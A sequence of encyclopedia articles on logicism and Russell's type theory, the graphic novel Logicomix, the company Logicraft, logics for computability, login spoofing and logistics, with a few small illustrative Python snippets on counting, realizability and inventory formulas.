Consider the sentence "Joe DiMaggio and the Yankees won the 1947 World Series". This sentence can be decomposed into two clauses: " x won the 1947 World Series" + " y won the 1947 World Series". The first sentence takes for x an individual "Joe DiMaggio" as its input, the other takes for y an aggregate "Yankees" as its input. Thus the composite-sentence has a (mixed) type of 2, mixed as to order (1 and 2).
By "predicative", Russell meant that the function must be of an order higher than the "type" of its variable(s). Thus a function (of order 2) that creates a class of classes can only entertain arguments for its variable(s) that are classes (type 1) and individuals (type 0), as these are lower types. Type 3 can only entertain types 2, 1 or 0, and so forth. But these types can be mixed (for example, for this sentence to be (sort of) true: " z won the 1947 World Series" could accept the individual (type 0) "Joe DiMaggio" and/or the names of his other teammates, and it could accept the class (type 1) of individual players "The Yankees".
The axiom of reducibility is the hypothesis that any function of any order can be reduced to (or replaced by) an equivalent predicative function of the appropriate order. [ 28 ] A careful reading of the first edition indicates that an n th order predicative function need not be expressed "all the way down" as a huge "matrix" or aggregate of individual atomic propositions. "For in practice only the relative types of variables are relevant; thus the lowest type occurring in a given context may be called that of individuals" (p. 161). But the axiom of reducibility proposes that in theory a reduction "all the way down" is possible.
By the 2nd edition of PM of 1927, though, Russell had given up on the axiom of reducibility and concluded he would indeed force any order of function "all the way down" to its elementary propositions, linked together with logical operators:
(The "stroke" is Sheffer's stroke – adopted for the 2nd edition of PM – a single two argument logical function from which all other logical functions may be defined.)
The net result, though, was a collapse of his theory. Russell arrived at this disheartening conclusion: that "the theory of ordinals and cardinals survives . . . but irrationals , and real numbers generally, can no longer be adequately dealt with. . . . Perhaps some further axiom, less objectionable than the axiom of reducibility, might give these results, but we have not succeeded in finding such an axiom" ( PM 1927:xiv).
Gödel 1944 agrees that Russell's logicist project was stymied; he seems to disagree that even the integers survived:
Gödel asserts, however, that this procedure seems to presuppose arithmetic in some form or other (p. 134). He deduces that "one obtains integers of different orders" (pp. 134–135); the proof in Russell's 1927 PM Appendix B that "the integers of any order higher than 5 are the same as those of order 5" is "not conclusive", and "the question whether (or to what extent) the theory of integers can be obtained on the basis of the ramified hierarchy [classes plus types] must be considered as unsolved at the present time". Gödel concluded that it would not matter anyway because propositional functions of order n (any n ) must be described by finite combinations of symbols (all quotes and content derived from page 135).
Gödel, in his 1944 work, identifies the place where he considers Russell's logicism to fail and offers suggestions to rectify the problems. He submits the "vicious circle principle" to re-examination, splitting it into three parts: "definable only in terms of", "involving" and "presupposing". It is the first part that "makes impredicative definitions impossible and thereby destroys the derivation of mathematics from logic, effected by Dedekind and Frege, and a good deal of mathematics itself". Since, he argues, mathematics seems to rely on its inherent impredicativities (e.g. "real numbers defined by reference to all real numbers"), he concludes that what he has offered is "a proof that the vicious circle principle is false [rather] than that classical mathematics is false" (all quotes Gödel 1944:127).
Russell's no-class theory is the root of the problem : Gödel believes that impredicativity is not "absurd", as it appears throughout mathematics. Russell's problem derives from his "constructivistic (or nominalistic) [ 29 ] standpoint toward the objects of logic and mathematics, in particular toward propositions, classes, and notions . . . a notion being a symbol . . . so that a separate object denoted by the symbol appears as a mere fiction" (p. 128).
Indeed, Russell's "no class" theory, Gödel concludes:
He concludes his essay with the following suggestions and observations:
Neo-logicism describes a range of views considered by their proponents to be successors of the original logicist program. [ 30 ] More narrowly, neo-logicism may be seen as the attempt to salvage some or all elements of Frege's programme through the use of a modified version of Frege's system in the Grundgesetze (which may be seen as a kind of second-order logic ).
For instance, one might replace Basic Law V (analogous to the axiom schema of unrestricted comprehension in naive set theory ) with some 'safer' axiom so as to prevent the derivation of the known paradoxes. The most cited candidate to replace BLV is Hume's principle , the contextual definition of '#' given by '# F = # G if and only if there is a bijection between F and G' . [ 31 ] This kind of neo-logicism is often referred to as neo-Fregeanism . [ 32 ] Proponents of neo-Fregeanism include Crispin Wright and Bob Hale , sometimes also called the Scottish School or abstractionist Platonism , [ 33 ] who espouse a form of epistemic foundationalism . [ 34 ]
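For finite extensions, Hume's principle can be illustrated directly, since a bijection between finite collections exists exactly when they have equal cardinality; the predicates below are invented examples:

```python
def extension(predicate, domain) -> set:
    """The objects in the domain falling under the predicate."""
    return {x for x in domain if predicate(x)}

def same_number(F, G, domain) -> bool:
    """#F = #G: a bijection exists between the two extensions."""
    return len(extension(F, domain)) == len(extension(G, domain))

domain = range(10)
F = lambda n: n % 2 == 0   # the evens below 10: five objects
G = lambda n: n >= 5       # the numbers 5..9: five objects

print(same_number(F, G, domain))  # True
```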
Other major proponents of neo-logicism include Bernard Linsky and Edward N. Zalta , sometimes called the Stanford–Edmonton School , abstract structuralism or modal neo-logicism , who espouse a form of axiomatic metaphysics . [ 34 ] [ 32 ] Modal neo-logicism derives the Peano axioms within second-order modal object theory . [ 35 ] [ 36 ]
Another quasi-neo-logicist approach has been suggested by M. Randall Holmes. In this kind of amendment to the Grundgesetze , BLV remains intact, save for a restriction to stratifiable formulae in the manner of Quine's NF and related systems. Essentially all of the Grundgesetze then 'goes through'. The resulting system has the same consistency strength as Jensen 's NFU + Rosser 's Axiom of Counting. [ 37 ] | https://en.wikipedia.org/wiki/Logicism |
Logicomix: An Epic Search for Truth is a graphic novel about the foundational quest in mathematics , written by Apostolos Doxiadis , author of Uncle Petros and Goldbach's Conjecture , and theoretical computer scientist Christos Papadimitriou . Character design and artwork are by Alecos Papadatos and color is by Annie Di Donna. The book was originally written in English, and was translated into Greek by author Apostolos Doxiadis for the release in Greece, which preceded the UK and U.S. releases.
Set between the late 19th century and the present day, the graphic novel Logicomix is based on the story of the so-called "foundational quest" in mathematics.
Logicomix intertwines the philosophical struggles with the characters' own personal turmoil. These are in turn played out just upstage of the momentous historical events of the era and the ideological battles which gave rise to them. The narrator of the story is Bertrand Russell , who stands as an icon of many of these themes: a deeply sensitive and introspective man, Russell was not just a philosopher and pacifist, he was also one of the prominent figures in the foundational quest. Russell's life story, depicted by Logicomix , is itself a journey through the goals and struggles, and triumph and tragedy shared by many great thinkers of the 20th century: Georg Cantor , Ludwig Wittgenstein , G. E. Moore , Alfred North Whitehead , David Hilbert , Gottlob Frege , Henri Poincaré , Kurt Gödel , and Alan Turing .
A parallel tale, set in present-day Athens , records the creators’ disagreement on the meaning of the story, thus setting in relief the foundational quest as a quintessentially modern adventure. It is on the one hand a tragedy of the hubris of rationalism , which descends inexorably into madness, and on the other an origin myth of the computer.
In chronological order:
Culture Critic assessed British and American critical response as an aggregated score of 86%. [ 1 ] On The Omnivore , an aggregator of British press, the book received an "omniscore" of four out of five. [ 2 ]
Jim Holt reviewed the book for the New York Times and said the story "is presented with real graphic verve. (Even though I’m a text guy, I couldn’t keep my eyes off the witty drawings.)", although he noted "one serious misstep" involving the overplaying of the impact Russell's paradox had on mathematics. [ 3 ] A review at The Guardian said that the "authors tell the story with a humour and lightness of touch that pokes fun at the philosophers and mathematicians involved, but never trivialises the philosophy or the mathematics", concluding that "Doxiadis has shown that by using fiction to provide an emotional context to mathematical discoveries it can make for a gripping read. Uncle Petros was a bestseller and the much more ambitious Logicomix deserves to be one too." [ 4 ]
The book was recommended by the New Statesman in late September. [ 5 ] On October 2 the book made the New York Times Sunday Book Review Editor's Choice list, [ 6 ] and the next week it was #1 on the NYT Graphic Novel Best Seller list. [ 7 ] The book sold out on the day it was released in the United States and United Kingdom, and also got into the Top 10 on Amazon.com and Amazon.co.uk , leading the manager of a major Athens bookstore to say "No Greek book has sold abroad like this in 30 years." [ 8 ]
At the beginning of the book (page 16) there is talk of "the non-aggression pact between Nazi Germany and the United Kingdom ", signed in Munich , which led to the invasion of Poland , with a drawing showing an infuriated Polish soldier accusing a Briton of being the culprit of such a crime. In fact, the Munich Agreement was concluded in 1938 and the "non-aggression pact" from the era was between Nazi Germany and the Soviet Union (namely the Molotov–Ribbentrop Pact ), which led to the invasion of Poland, with the UK then declaring war on Germany.
According to Paolo Mancosu in The Bulletin of Symbolic Logic , the authors "admittedly take liberties with the real course of events", for example with reference to the alleged meetings Russell would have had with Frege and Cantor. Although "such departures from reality can be fruitful for narrative purposes", according to Mancosu, in some cases they are objectionable, such as the portrayal of Frege as a "rabid paranoid antisemite" and the "constant refrain of the alleged causal link between logic and madness". From "the conceptual point of view, some of the major ideas about the foundation of mathematics are conveyed with reasonable accuracy", although errors and inaccuracies sometimes occur. [ 9 ]
However, the global judgement by Mancosu is positive:
I enjoyed reading Logicomix immensely. The authors have tackled an extremely complicated subject with thought-provoking ideas in an aesthetically pleasing and entertaining fashion. Thus, my few critical remarks should not mislead you. I highly recommend Logicomix even though my recommendation is qualified: the reader should provide his/her grain of salt. [ 10 ] | https://en.wikipedia.org/wiki/Logicomix |
Logicraft was an American software company. The company's products enabled Digital Equipment Corporation (DEC) minicomputers to run PC software (such as Lotus-123 ).
Augmenting a DEC VAX or PDP-11 multi-user minicomputer with a Logicraft MS-DOS "card" that was itself multi-user allowed a person sitting at a simple terminal to run PC applications. [ 1 ] This provided "controlled access to PC resources without putting both a PC and a VT terminal on every desk top." [ 2 ] [ 3 ] As of mid-1988, Logicraft and another firm, Virtual Microsystems Inc (VMI), were "the only commercially available products that let VAX/VMS systems run standard off-the-shelf PC applications from terminals and VAXstations ." [ 3 ]
Logicraft's Omniware was a combined hardware/software offering. [ 4 ] Some users went beyond running PC applications [ 5 ] and used serially shared CD-ROM access. [ 6 ]
| https://en.wikipedia.org/wiki/Logicraft |
Logics for computability are formulations of logic that capture some aspect of computability as a basic notion. This usually involves a mix of special logical connectives as well as a semantics that explains how the logic is to be interpreted in a computational way.
Probably the first formal treatment of logic for computability is the realizability interpretation by Stephen Kleene in 1945, who gave an interpretation of intuitionistic number theory in terms of Turing machine computations. His motivation was to make precise the Brouwer–Heyting–Kolmogorov (BHK) interpretation of intuitionism, according to which proofs of mathematical statements are to be viewed as constructive procedures.
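A loose sketch of the realizability idea (not Kleene's precise 1945 definition): a constructive proof of a ∀∃ statement is an effective procedure producing a witness for each input:

```python
def realizer(n: int) -> int:
    """Witness function for the statement ∀n ∃m (m > n)."""
    return n + 1

# Checking that the produced witness satisfies the matrix m > n:
for n in (0, 7, 100):
    assert realizer(n) > n
print("statement realized on sample inputs")
```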
With the rise of many other kinds of logic, such as modal logic and linear logic , and novel semantic models, such as game semantics , logics for computability have been formulated in several contexts. Here we mention two.
Kleene's original realizability interpretation has received much attention among those who study connections between computability and logic. It was extended to full higher-order intuitionistic logic by Martin Hyland in 1982, who constructed the effective topos . In 2002, Steve Awodey , Lars Birkedal , and Dana Scott formulated a modal logic for computability , which extended the usual realizability interpretation with two modal operators expressing the notion of being "computably true".
Computability logic refers to a research programme initiated by Giorgi Japaridze in 2003. Its ambition is to redevelop logic from a game-theoretic semantics. Such a semantics sees games as formal equivalents of interactive computational problems, and their "truth" as existence of algorithmic winning strategies. | https://en.wikipedia.org/wiki/Logics_for_computability |
Login spoofing is a technique used to steal a user's password . [ 1 ] [ 2 ] The user is presented with an ordinary-looking login prompt for username and password, which is actually a malicious program (usually called a Trojan horse ) under the control of the attacker . When the username and password are entered, this information is logged or in some way passed along to the attacker, breaching security.
To prevent this, some operating systems require a special key combination (called a secure attention key ) to be entered before a login screen is presented, for example Control-Alt-Delete . Users should be instructed to report login prompts that appear without having pressed this secure attention sequence . Only the kernel , which is the part of the operating system that interacts directly with the hardware, can detect whether the secure attention key has been pressed, so it cannot be intercepted by third party programs (unless the kernel itself has been compromised).
While similar to login spoofing, phishing usually involves a scam in which victims respond to unsolicited e-mails that are identical or similar in appearance to a familiar site with which they may have a prior affiliation. Login spoofing, by contrast, usually indicates a more serious attack in which the attacker has already gained some degree of access to the victim's computer.
Internet-based login spoofing [ 3 ] can be caused by | https://en.wikipedia.org/wiki/Login_spoofing |
Logistics is the part of supply chain management that deals with the efficient forward and reverse flow of goods, services, and related information from the point of origin to the point of consumption according to the needs of customers. [ 2 ] [ 3 ] Logistics management is a component that holds the supply chain together. [ 3 ] The resources managed in logistics may include tangible goods such as materials, equipment, and supplies, as well as food and other edible items.
Military logistics is concerned with maintaining army supply lines with food, armaments, ammunition, and spare parts, apart from the transportation of troops themselves. Meanwhile, civil logistics deals with acquiring, moving, and storing raw materials, semi-finished goods, and finished goods. For organisations that provide garbage collection , mail deliveries, public utilities , and after-sales services, logistical problems must be addressed. [ 2 ]
Logistics deals with the movements of materials or products from one facility to another; it does not include material flow within production or assembly plants, such as production planning or single-machine scheduling . [ 2 ] Logistics accounts for a significant share of the operational cost of an organisation or country. Logistical costs of organizations in the United States amounted to about 11% of the United States gross domestic product (GDP) as of 1997. In the European Union , logistics costs were 8.8% to 11.5% of GDP as of 1993. [ 2 ]
Dedicated simulation software can model, analyze, visualize, and optimize logistics' complexity. Minimizing resource use is a common motivation in all logistics fields. A professional working in logistics management is called a logistician.
The term logistics is attested in English from 1846. It is from French: logistique , where it was either coined or popularized by Swiss military officer and writer Antoine-Henri Jomini , who defined it in his Summary of the Art of War ( Précis de l'Art de la Guerre ). The term appears in the 1830 edition, then titled Analytic Table ( Tableau Analytique ), [ 4 ] and Jomini explains that it is derived from French : logis , lit. 'lodgings' (cognate to English lodge ), in the terms French : maréchal des logis , lit. 'marshall of lodgings' and French : major-général des logis , lit. 'major-general of lodging':
Autrefois les officiers de l’état-major se nommaient: maréchal des logis, major-général des logis; de là est venu le terme de logistique, qu’on emploie pour désigner ce qui se rapporte aux marches d’une armée. Formerly the officers of the general staff were named: marshall of lodgings, major-general of lodgings; from there came the term of logistics [ logistique ], which we employ to designate those who are in charge of the functioning of an army.
The term is credited to Jomini, and the term and its etymology criticized by Georges de Chambray [ fr ] in 1832, writing: [ 5 ]
Logistique : Ce mot me paraît être tout-à-fait nouveau, car je ne l'avais encore vu nulle part dans la littérature militaire. … il paraît le faire dériver du mot logis , étymologie singulière … Logistic : This word appears to me to be completely new, as I have not yet seen it anywhere in military literature. … he appears to derive it from the word lodgings [ logis ], a peculiar etymology …
Chambray also notes that the term logistique was present in the Dictionnaire de l'Académie française as a synonym for algebra .
The French word logistique is a homonym of an existing mathematical term, from Ancient Greek : λογῐστῐκός , romanized : logistikós , a traditional division of Greek mathematics ; the mathematical term is presumably the origin of the term logistic in logistic growth and related terms. Some sources give this instead as the source of logistics , [ 6 ] either ignorant of Jomini's statement that it was derived from logis , or doubting that account and believing it was in fact of Greek origin, or influenced by the existing term of Greek origin.
Jomini originally defined logistics as: [ 4 ]
... l'art de bien ordonner les marches d'une armée, de bien combiner l'ordre des troupes dans les colonnes, les tems [temps] de leur départ, leur itinéraire, les moyens de communications nécessaires pour assurer leur arrivée à point nommé ...
... the art of well-ordering the functionings of an army, of well combining the order of troops in columns, the times of their departure, their itinerary, the means of communication necessary to assure their arrival at the right time ...
The Oxford English Dictionary defines logistics as "the branch of military science relating to procuring, maintaining and transporting material, personnel and facilities". However, the New Oxford American Dictionary defines logistics as "the detailed coordination of a complex operation involving many people, facilities, or supplies", and the Oxford Dictionary on-line defines it as "the detailed organization and implementation of a complex operation". [ 7 ] As such, logistics is commonly seen as a branch of engineering that creates "people systems" rather than "machine systems".
According to the Council of Supply Chain Management Professionals (previously the Council of Logistics Management), [ 8 ] logistics is the process of planning, implementing and controlling procedures for the efficient and effective transportation and storage of goods including services and related information from the point of origin to the point of consumption for the purpose of conforming to customer requirements and includes inbound, outbound, internal and external movements. [ 9 ]
Academics and practitioners traditionally refer to the terms operations or production management when referring to physical transformations taking place in a single business location (factory, restaurant or even bank clerking) and reserve the term logistics for activities related to distribution, that is, moving products across the territory. Managing a distribution center is seen, therefore, as pertaining to the realm of logistics: while in theory the products made by a factory are ready for consumption, they still need to be moved along the distribution network according to some logic, and the distribution center aggregates and processes orders coming from different areas of the territory. That being said, from a modeling perspective, there are similarities between operations management and logistics, and companies sometimes use hybrid professionals, with, for example, a "Director of Operations" or a "Logistics Officer" working on similar problems. Furthermore, the term " supply chain management " originally referred to, among other issues, having an integrated vision of both production and logistics from point of origin to point of production. [ 10 ] All these terms may suffer from semantic change as a side effect of advertising.
Logistical activities can be divided into three main areas: order processing, inventory management, and freight transportation. Traditionally, order processing was a time-consuming activity that could take up to 70% of the order-cycle time. However, with new technologies such as bar code scanning, computers, and network connections, customer orders can reach the seller almost instantly, and the availability of stocks can be checked in real time. The purpose of having an inventory is to reduce the overall logistical cost while improving service to customers. Having a stockpile of finished goods beforehand can reduce the frequency of transportation to and from the customers and cope with the randomness of customer demands. However, maintaining an inventory requires capital investment in finished goods and in maintaining a warehouse. Storage and order picking account for most of the warehouse maintenance cost. Freight transportation forms a vital part of logistics and allows access to broad markets, as goods can be transported hundreds or thousands of kilometers away. Freight transportation accounts for two-thirds of logistical costs and significantly impacts customer service. Transportation policies and warehouse management are closely intertwined. [ 2 ]
The rise of commercial transactions through the internet gives rise to the need for "e-logistics". Compared to traditional logistics, e-logistics handles parcels valued at less than a hundred US dollars to customers scattered at various destinations worldwide. In e-logistics, customers' demands come in waves when compared to traditional logistics, where the demand is consistent. [ 2 ]
Inbound logistics is one of the primary logistics processes concentrating on purchasing and arranging the inbound movement of materials, parts, or unfinished inventory from suppliers to manufacturing or assembly plants, warehouses, or retail stores.
Outbound logistics is the process related to the storage and movement of the final product. The related information flows from the end of the production line to the end user.
Given the services performed by logisticians, the main fields of logistics can be broken down as follows:
Procurement logistics consists of market research , requirements planning, make-or-buy decisions, supplier management, ordering, and order control. The targets in procurement logistics might be contradictory: maximizing efficiency by concentrating on core competencies, outsourcing while maintaining the company's autonomy, or minimizing procurement costs while maximizing security within the supply process.
Advance logistics consists of the activities required to set up or establish a plan for logistics activities to occur.
Global logistics is technically the process of managing the "flow" of goods through a supply chain from its place of production to other parts of the world. This often requires an intermodal transport system via ocean, air, rail, and truck. The effectiveness of global logistics is measured in the Logistics Performance Index .
Distribution logistics has, as its main task, the delivery of the finished products to the customer. It consists of order processing, warehousing, and transportation. Distribution logistics is necessary because production time, place, and quantity differ with the time, place, and quantity of consumption. [ 11 ]
Disposal logistics has the main function of reducing logistics cost(s) and enhancing service(s) related to the disposal of waste produced during a business's operation.
Reverse logistics denotes all operations related to the reuse of products and materials. The reverse logistics process includes the management and the sale of surpluses, as well as products being returned to vendors from buyers. It is "the process of planning, implementing, and controlling the efficient, cost-effective flow of raw materials, in-process inventory, finished goods, and related information from the point of consumption to the point of origin to recapture value or proper disposal." [ 12 ] More precisely, reverse logistics moves goods from their typical final destination to capture value or proper disposal. The opposite of reverse logistics is forward logistics .
Green logistics describes all attempts to measure and minimize the ecological impact of logistics activities, including all activities of the forward and reverse flows. This can be achieved through intermodal freight transport , path optimization, vehicle saturation, and city logistics .
RAM logistics (see also Logistic engineering ) combines both business logistics and military logistics since it concerns highly complicated technological systems for which reliability , availability and maintainability are essential, e.g., weapon system and military supercomputers.
Asset control logistics : companies in the retail channels, both organized retailers and suppliers, often deploy assets required for the display, preservation, and promotion of their products. Some examples are refrigerators, stands, display monitors, seasonal equipment, poster stands & frames.
Emergency logistics (or humanitarian logistics ) is a term used by the logistics, supply chain, and manufacturing industries to denote specific time-critical modes of transport used to move goods rapidly in the event of an emergency. [ 13 ] The reason for enlisting emergency logistics services could be a production delay or anticipated production delay, or an urgent need for specialized equipment to prevent events such as aircraft being grounded (also known as " aircraft on ground "—AOG), ships being delayed, or telecommunications failure. Humanitarian logistics involves governments, the military, aid agencies , donors, non-governmental organizations, and emergency logistics services are typically sourced from a specialist provider. [ 13 ] [ 14 ]
The term production logistics describes logistic processes within a value-adding system (e.g., a factory or a mine). Production logistics aims to ensure that each machine and workstation receives the right product in the correct quantity and quality at the right time. The concern is with production, testing, transportation, storage, and supply. Production logistics can operate in existing as well as new plants. Since manufacturing in an existing plant is a constantly changing process, machines are exchanged and new ones added, which allows for improving the production logistics system accordingly. [ 15 ] Production logistics provides the means to achieve customer response and capital efficiency. Production logistics becomes more important with decreasing batch sizes. In many industries (e.g. mobile phones ), the short-term goal is a batch size of one, allowing even a single customer's demand to be fulfilled efficiently. Track and tracing , which is an essential part of production logistics due to product safety and reliability issues, is also gaining importance, especially in the automotive and medical industries.
Construction logistics has been employed by civilizations for thousands of years, as they tried to build the best possible works of construction for living and protection. Now, construction logistics has emerged as a vital part of construction. In the past few years, it has also developed into a distinct field of knowledge and study within supply chain management and logistics.
The Seven R's is a popular concept used to enforce best practices in logistics management which consists of the following: [ 16 ]
In military science, maintaining one's supply lines while disrupting those of the enemy is a crucial—some would say the most crucial—element of military strategy , since an armed force without resources and transportation is defenseless. The historical leaders Hannibal , Alexander the Great , and the Duke of Wellington are considered to have been logistical geniuses: Alexander's expedition benefited considerably from his meticulous attention to the provisioning of his army, [ 18 ] Hannibal is credited with having "taught logistics" to the Romans during the Punic Wars , [ 19 ] and the success of the Anglo-Portuguese army in the Peninsular War was due to the effectiveness of Wellington's supply system, despite its numerical disadvantage. [ 20 ] The defeat of the British in the American War of Independence and the defeat of the Axis in the African theater of World War II are attributed by some scholars to logistical failures. [ 21 ]
Militaries have a significant need for logistics solutions and so have developed advanced implementations. Integrated logistics support (ILS) is a discipline used in military industries to ensure an easily supportable system with a robust customer service (logistic) concept at the lowest cost and in line with (often high) reliability, availability, maintainability, and other requirements, as defined for the project.
In military logistics , Logistics Officers manage how and when to move resources to the places they are needed.
Supply chain management in military logistics often deals with a number of variables in predicting cost, deterioration, consumption , and future demand. The United States Armed Forces ' categorical supply classification was developed in such a way that categories of supply with similar consumption variables are grouped together for planning purposes. For instance, peacetime consumption of ammunition and fuel will be considerably lower than wartime consumption of these items, whereas other classes of supply such as subsistence and clothing have a relatively consistent consumption rate regardless of war or peace.
Some classes of supply have a linear demand relationship: as more troops are added, more supply items are needed; or as more equipment is used, more fuel and ammunition are consumed. Other classes of supply must consider a third variable besides usage and quantity: time. As equipment ages, more and more repair parts are needed over time, even when usage and quantity stay consistent. By recording and analyzing these trends over time and applying them to future scenarios, the US Armed Forces can accurately supply troops with the items necessary at the precise moment they are needed. [ 22 ] History has shown that good logistical planning creates a lean and efficient fighting force. The lack thereof can lead to a clunky, slow, and ill-equipped force with too much or too little supply.
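To make these two demand patterns concrete, the sketch below contrasts consumption that scales linearly with troop count against repair-part demand that also grows with equipment age; all rates and figures are hypothetical illustrations, not actual planning factors.

```python
def forecast_demand(troops: int, rate_per_troop: float,
                    equipment_age_years: float,
                    base_parts_demand: float, parts_growth: float):
    """Two stylized demand patterns: consumables scale linearly with the
    number of troops, while repair-part demand also grows with equipment
    age even when usage and quantity stay constant."""
    consumables = troops * rate_per_troop                      # linear in quantity
    repair_parts = base_parts_demand * (1 + parts_growth) ** equipment_age_years
    return consumables, repair_parts

# 5,000 troops at 1.2 units per troop; parts demand growing 10%/year
# on equipment that is 8 years old (all figures invented for illustration)
print(forecast_demand(5_000, 1.2, 8, 300.0, 0.10))  # (6000.0, ~643.1)
```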
One definition of business logistics speaks of "having the right item in the right quantity at the right time at the right place for the right price in the right condition to the right customer". [ 23 ] Business logistics incorporates all industry sectors and aims to manage the fruition of project life cycles , supply chains , and resultant efficiencies.
The term business logistics has evolved since the 1960s [ 24 ] due to the increasing complexity of supplying businesses with materials and shipping out products in an increasingly globalized supply chain, leading to a call for professionals called supply chain logisticians.
In business, logistics may have either an internal focus (inbound logistics) or an external focus (outbound logistics), covering the flow and storage of materials from point of origin to point of consumption, a key factor in supply-chain management . The main functions of a qualified logistician include inventory management , purchasing , transportation, warehousing , consultation, and the organizing and planning of these activities. Logisticians combine professional knowledge of each of these functions to coordinate resources in an organization.
There are two fundamentally different forms of logistics: one optimizes a steady flow of material through a network of transport links and storage nodes, while the other coordinates a sequence of resources to carry out some project , such as restructuring a warehouse.
A distribution network requires several intermediaries to bring consumer or industrial goods from manufacturers to users. Intermediaries mark up the cost of products during distribution, but benefit users by offering lower transportation costs than the manufacturers would. The number of intermediaries required for the distribution network depends upon the types of goods being distributed. For example, consumer goods such as cosmetics and handicrafts may not require any intermediaries, as they can be sold door-to-door or obtained from local flea markets. For industrial goods such as raw materials and equipment, intermediaries are not needed because manufacturers can sell a large quantity of goods directly to a user. Generally, there are three types of intermediaries, namely: agent/broker, wholesaler, and retailer. [ 2 ]
The nodes of a distribution network include:
A logistic family is a set of products that share a common characteristic: weight and volumetric characteristics, physical storing needs (temperature, radiation, etc.), handling needs, order frequency, package size, etc. The following metrics may be used by the company to organize its products in different families: [ 25 ]
Other metrics may present themselves in both physical or monetary form, such as the standard inventory turnover .
Unit loads are combinations of individual items that are moved by handling systems, usually employing a pallet of standardized dimensions. [ 26 ]
Handling systems include: trans-pallet handlers, counterweight handlers, retractable mast handlers, bilateral handlers, trilateral handlers, AGVs , and other handlers.
Storage systems include: pile stocking, cell racks (either static or movable), cantilever racks and gravity racks. [ 27 ]
Order processing is a sequential process involving: processing the withdrawal list, picking (selective removal of items from loading units), sorting (assembling items based on destination), package formation (weighing, labeling, and packing), and order consolidation (gathering packages into loading units for transportation, control, and the bill of lading ). [ 28 ]
Picking can be either manual or automated. Manual picking can be either man-to-goods, i.e. the operator using a cart or conveyor belt, or goods-to-man, i.e. the operator benefiting from the presence of a mini-load ASRS , a vertical or horizontal carousel , or an Automatic Vertical Storage System (AVSS). Automated picking is done either with dispensers or depalletizing robots.
Sorting can be done manually through carts or conveyor belts, or automatically through sorters .
Consolidating small shipments into large shipments can help to save transportation costs. There are three methods of doing this: facility consolidation, multi-stop consolidation, and temporal consolidation. Facility consolidation exploits economies of scale by transporting small shipments over short distances and large shipments over long distances. Multi-stop consolidation makes multiple stops to consolidate small shipments, as in less-than-truckload shipping . Temporal consolidation adjusts shipping schedules forward or backward so as to make a single large shipment rather than several small shipments over time, as illustrated below. [ 2 ]
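As a rough illustration of the savings from temporal consolidation, assume a hypothetical tariff in which every dispatch pays a fixed charge plus a per-unit rate; the numbers below are invented for the example.

```python
def shipping_cost(shipments: int, units_per_shipment: int,
                  fixed_cost: float, unit_cost: float) -> float:
    """Total cost when each dispatch pays a fixed charge plus a per-unit rate."""
    return shipments * (fixed_cost + units_per_shipment * unit_cost)

# Five weekly shipments of 20 units vs. one consolidated shipment of 100 units
print(shipping_cost(5, 20, fixed_cost=400.0, unit_cost=2.0))   # 2200.0
print(shipping_cost(1, 100, fixed_cost=400.0, unit_cost=2.0))  # 600.0, the consolidated option
```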
Cargo can be consolidated into pallets or containers. There are five basic modes of transport, namely ship, rail, truck, air, and pipeline, operated by different carriers . These shipping methods can be combined in various ways, such as intermodal transport (no handling), multimodal transport , and combined transport (minimal road transport). A shipper chooses a carrier by taking into account the total cost of shipment and transit time. Air is the most expensive mode of transport, followed by truck, rail, pipeline, and ship. [ 2 ]
Cargo can be organized in different shipment categories . Unit loads are usually assembled into higher standardized units such as ISO containers , swap bodies or semi-trailers . Especially for very long distances, product transportation will likely benefit from combining different transportation means. When moving cargo, typical constraints are maximum weight and volume .
Operators involved in transportation include: rail, road, shipping, and airline companies, couriers , freight forwarders and multi-modal transport operators .
Merchandise being transported internationally is usually subject to the Incoterms standards issued by the International Chamber of Commerce .
In the logistics business, a logistical system is designed at minimum cost based on the expected customer service level. As service improves, the number of sales also increases. As service is further improved, more sales are captured from competing providers. Beyond that point, further increases in customer service level only increase sales marginally. [ 2 ]
Similarly to production systems, logistic systems need to be properly configured and managed. A number of methodologies have been borrowed directly from operations management , such as using Economic Order Quantity models for managing inventory in the nodes of the network. [ 29 ] Distribution resource planning (DRP) is similar to MRP , except that it does not concern activities inside the nodes of the network but rather the planning of distribution when moving goods through the links of the network.
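For instance, the Economic Order Quantity model mentioned above has the closed form Q* = sqrt(2DK/h). A minimal sketch, with hypothetical demand and cost figures:

```python
from math import sqrt

def eoq(annual_demand: float, order_cost: float, holding_cost: float) -> float:
    """Economic Order Quantity: the order size minimizing the sum of annual
    ordering and holding costs, Q* = sqrt(2 * D * K / h)."""
    return sqrt(2 * annual_demand * order_cost / holding_cost)

# Hypothetical figures: 12,000 units/year, $50 per order, $2.40 per unit per year
print(round(eoq(12_000, 50.0, 2.40)))  # about 707 units per order
```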
Traditionally in logistics, configuration may be at the level of the warehouse ( node ) or at level of the distribution system ( network ).
Regarding a single warehouse, besides the issue of designing and building the warehouse, configuration means solving a number of interrelated technical-economic problems: dimensioning rack cells, choosing a palletizing method (manual or through robots ), rack dimensioning and design, number of racks, and the number and typology of retrieval systems (e.g. stacker cranes ). Some important constraints have to be satisfied: fork and load beam resistance to bending and proper placement of sprinklers . Although picking is more of a tactical planning decision than a configuration problem, it is important to take it into account when deciding the layout of the racks inside the warehouse and when buying tools such as handlers and motorized carts, since once those decisions are taken they will act as constraints when managing the warehouse; the same reasoning applies to sorting when designing the conveyor system or installing automatic dispensers .
Configuration at the level of the distribution system concerns primarily the problem of locating the nodes in geographic space and distributing capacity among the nodes. The first may be referred to as facility location (with the special case of site selection ) while the latter may be referred to as capacity allocation. The problem of outsourcing typically arises at this level: the nodes of a supply chain are very rarely owned by a single enterprise. Distribution networks can be characterized by their number of levels, namely the number of intermediary nodes between supplier and consumer:
This distinction is more useful for modeling purposes, but it also relates to a tactical decision regarding safety stocks : considering a two-level network, if safety inventory is kept only in peripheral warehouses, the system is called dependent (from suppliers); if safety inventory is distributed among central and peripheral warehouses, it is called independent (from suppliers). [ 25 ] Transportation from the producer to the second level is called primary transportation; from the second level to the consumer, secondary transportation.
Although configuring a distribution network from scratch is possible, logisticians usually have to deal with restructuring existing networks due to an array of factors: changing demand, product or process innovation, opportunities for outsourcing, changes in government policy toward trade barriers , innovation in transportation means (both vehicles and thoroughfares ), the introduction of regulations (notably those regarding pollution), and the availability of ICT supporting systems, such as ERP or e-commerce .
Once a logistic system is configured, management, meaning tactical decisions, takes place, once again, at the level of the warehouse and of the distribution network. Decisions have to be made under a set of constraints : internal, such as using the available infrastructure, or external, such as complying with given product shelf lives and expiration dates .
